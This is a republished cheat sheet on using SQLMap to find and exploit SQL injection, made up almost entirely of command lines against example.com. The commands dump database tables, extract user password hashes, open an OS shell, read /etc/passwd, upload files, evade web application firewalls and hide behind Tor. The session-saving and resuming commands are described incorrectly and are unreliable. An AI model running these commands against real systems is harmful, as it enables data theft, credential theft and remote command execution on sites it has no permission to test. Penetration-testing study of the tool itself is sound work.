Home >Backend Development >Python Tutorial >SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

Linda Hamilton
Linda HamiltonOriginal
2024-09-26 15:30:02989browse

SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

Author: Trix Cyrus

What is SQLMap?
SQLMap is an open-source penetration testing tool used to detect and exploit SQL injection vulnerabilities in web applications. It supports various database systems like MySQL, PostgreSQL, Oracle, Microsoft SQL Server, and more.

Basic Usage
To start with SQLMap, you can run it in its simplest form by providing the target URL:

sqlmap -u "http://example.com/index.php?id=1"

This command scans the target URL for SQL injection vulnerabilities.

1. Detecting Vulnerabilities
Use the following options to perform a basic vulnerability scan and automatically detect SQL injection points:

sqlmap -u "http://example.com/index.php?id=1" --dbs

--dbs: Lists all available databases on the target server if a vulnerability is found.

2. Specifying POST Requests

For targets that require a POST request (usually in login forms), you can specify the data like this:

sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"

3. Bypassing WAFs and Filters

To evade Web Application Firewalls (WAFs), SQLMap includes payload obfuscation techniques:

sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment

--tamper: Uses tamper scripts to evade filters. Example: space2comment, charencode.

4. Extracting Databases, Tables, and Columns
To get a list of databases on the target system:

sqlmap -u "http://example.com/index.php?id=1" --dbs

Once a database is identified, extract its tables:

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables

To get columns from a specific table:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns

5. Dumping Data

Dumping the contents of a table is one of the most useful features of SQLMap. For example, to dump all data from a specific table:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump

6. Enumerating Database Users and Passwords

SQLMap can also be used to enumerate database users and even crack hashed passwords:

sqlmap -u "http://example.com/index.php?id=1" --users
sqlmap -u "http://example.com/index.php?id=1" --passwords

7. Accessing the Operating System

In some cases, SQLMap can be used to execute commands on the operating system, especially when the database user has high-level privileges:

sqlmap -u "http://example.com/index.php?id=1" --os-shell

This will provide an interactive shell where you can execute commands on the target system.

8. File Upload and Reading

You can also read files from the target system or upload malicious files (if permitted):

sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"

9. Using Tor for Anonymity

To hide your identity, you can run SQLMap through the Tor network:

sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor

--tor: Enables Tor.
--check-tor: Verifies if the connection is made through Tor.

10. Saving and Resuming Sessions

SQLMap allows you to save and resume your progress by using the --session option:

sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name

Later, you can resume the same session by:

sqlmap -r your_session_name

11. Verbose Mode

To see detailed information about what SQLMap is doing:

sqlmap -u "http://example.com/index.php?id=1" -v 3

The -v option controls verbosity (levels from 0 to 6, where 6 shows all details).

  1. Automated Scans for Multiple Targets

SQLMap supports scanning multiple URLs stored in a file:

sqlmap -m urls.txt --batch

--batch: Automatically answer all prompts with default options, useful for automated scanning.

also use --risk=3 and --level=5 to advance scanning
You can use this cheat sheet to introduce readers to the essential commands of SQLMap and help them get started with SQL injection testing.

~TrixSec

The above is the detailed content of SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection. For more information, please follow other related articles on the PHP Chinese website!

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn